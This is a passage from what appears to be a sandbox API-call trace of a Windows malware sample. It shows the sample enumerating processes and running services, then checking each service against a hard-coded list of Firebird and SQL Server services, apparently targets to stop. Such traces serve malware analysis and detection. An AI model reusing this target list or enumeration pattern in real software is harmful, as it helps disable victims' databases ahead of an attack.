hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0043.454] lstrlenW (lpString="boss isolated.exe") returned 17 [0043.454] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0043.455] lstrlenW (lpString="member.exe") returned 10 [0043.455] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0043.455] lstrlenW (lpString="chubby-er.exe") returned 13 [0043.455] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0043.456] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0043.456] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0043.457] lstrlenW (lpString="organization.exe") returned 16 [0043.457] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0043.458] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0043.458] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0043.459] lstrlenW (lpString="spray-roman.exe") returned 15 [0043.459] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0043.460] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0043.460] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0043.461] lstrlenW (lpString="tank attacks.exe") returned 16 [0043.461] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0043.462] lstrlenW (lpString="wires jacket.exe") returned 16 [0043.462] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0043.463] lstrlenW (lpString="values.exe") returned 10 [0043.463] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0043.464] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0043.464] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0043.465] lstrlenW (lpString="printersaerospace.exe") returned 21 [0043.465] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0043.466] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0043.466] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0043.467] lstrlenW (lpString="dllhost.exe") returned 11 [0043.467] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0043.468] lstrlenW (lpString="joke.exe") returned 8 [0043.468] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0043.469] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0043.469] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0043.470] lstrlenW (lpString="documents.exe") returned 13 [0043.470] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0043.470] lstrlenW (lpString="rebel.exe") returned 9 [0043.471] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0043.471] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0043.471] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0043.472] lstrlenW (lpString="conhost.exe") returned 11 [0043.472] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0043.473] lstrlenW (lpString="conhost.exe") returned 11 [0043.473] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0043.474] lstrlenW (lpString="hgaibc.exe") returned 10 [0043.474] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0043.475] lstrlenW (lpString="cmd.exe") returned 7 [0043.475] Process32NextW (in: hSnapshot=0x27c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0043.476] CloseHandle (hObject=0x27c) returned 1 [0043.476] Sleep (dwMilliseconds=0x1f4) [0044.989] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ea20 [0044.989] EnumServicesStatusExW (in: hSCManager=0x60ea20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0044.989] GetLastError () returned 0xea [0044.989] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1cee) returned 0x632918 [0044.989] EnumServicesStatusExW (in: hSCManager=0x60ea20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x632918, cbBufSize=0x1cee, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x632918, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0044.990] CloseServiceHandle (hSCObject=0x60ea20) returned 1 [0044.990] lstrlenW (lpString="Appinfo") returned 7 [0044.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0044.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0044.990] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0044.990] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0044.990] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0044.990] lstrlenW (lpString="AppXSvc") returned 7 [0044.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0044.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0044.991] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0044.991] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0044.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0044.991] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0044.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0044.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0044.991] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0044.991] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0044.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0044.991] lstrlenW (lpString="Audiosrv") returned 8 [0044.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0044.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0044.991] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0044.991] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0044.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0044.991] lstrlenW (lpString="BFE") returned 3 [0044.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0044.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0044.991] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0044.991] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0044.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0044.991] lstrlenW (lpString="BITS") returned 4 [0044.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0044.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0044.991] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0044.991] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0044.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0044.991] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0044.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0044.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0044.991] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0044.991] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0044.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0044.991] lstrlenW (lpString="CDPSvc") returned 6 [0044.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0044.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0044.992] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0044.992] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0044.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0044.992] lstrlenW (lpString="ClickToRunSvc") returned 13 [0044.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0044.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0044.992] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0044.992] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0044.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0044.992] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0044.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0044.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0044.992] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0044.992] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0044.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0044.992] lstrlenW (lpString="CryptSvc") returned 8 [0044.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0044.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0044.992] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0044.992] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0044.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0044.992] lstrlenW (lpString="DcomLaunch") returned 10 [0044.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0044.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0044.992] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0044.992] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0044.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0044.992] lstrlenW (lpString="DeviceAssociationService") returned 24 [0044.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0044.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0044.993] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0044.993] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0044.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0044.993] lstrlenW (lpString="Dhcp") returned 4 [0044.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0044.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0044.993] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0044.993] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0044.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0044.993] lstrlenW (lpString="Dnscache") returned 8 [0044.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0044.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0044.993] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0044.993] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0044.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0044.993] lstrlenW (lpString="DoSvc") returned 5 [0044.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0044.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0044.993] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0044.993] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0044.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0044.993] lstrlenW (lpString="DPS") returned 3 [0044.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0044.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0044.993] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0044.993] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0044.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0044.993] lstrlenW (lpString="DusmSvc") returned 7 [0044.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0044.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0044.994] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0044.994] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0044.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0044.994] lstrlenW (lpString="EventLog") returned 8 [0044.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0044.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0044.994] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0044.994] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0044.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0044.994] lstrlenW (lpString="EventSystem") returned 11 [0044.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0044.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0044.994] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0044.994] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0044.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0044.994] lstrlenW (lpString="FontCache") returned 9 [0044.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0044.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0044.994] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0044.994] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0044.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0044.994] lstrlenW (lpString="gpsvc") returned 5 [0044.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0044.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0044.994] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0044.994] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0044.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0044.995] lstrlenW (lpString="iphlpsvc") returned 8 [0044.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0044.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0044.995] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0044.995] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0044.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0044.995] lstrlenW (lpString="KeyIso") returned 6 [0044.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0044.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0044.995] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0044.995] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0044.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0044.995] lstrlenW (lpString="LanmanServer") returned 12 [0044.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0044.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0044.995] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0044.995] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0044.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0044.995] lstrlenW (lpString="LanmanWorkstation") returned 17 [0044.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0044.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0044.995] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0044.995] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0044.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0044.995] lstrlenW (lpString="lfsvc") returned 5 [0044.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0044.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0044.995] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0044.995] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0044.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0044.996] lstrlenW (lpString="lmhosts") returned 7 [0044.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0044.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0044.996] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0044.996] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0044.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0044.996] lstrlenW (lpString="LSM") returned 3 [0044.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0044.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0044.996] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0044.996] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0044.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0044.996] lstrlenW (lpString="MpsSvc") returned 6 [0044.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0044.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0044.996] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0044.996] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0044.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0044.996] lstrlenW (lpString="NcbService") returned 10 [0044.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0044.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0044.996] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0044.996] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0044.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0044.996] lstrlenW (lpString="netprofm") returned 8 [0044.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0044.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0044.996] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0044.997] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0044.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0044.997] lstrlenW (lpString="NgcSvc") returned 6 [0044.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0044.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0044.997] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0044.997] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0044.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0044.997] lstrlenW (lpString="NlaSvc") returned 6 [0044.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0044.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0044.997] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0044.997] lstrcmpiW 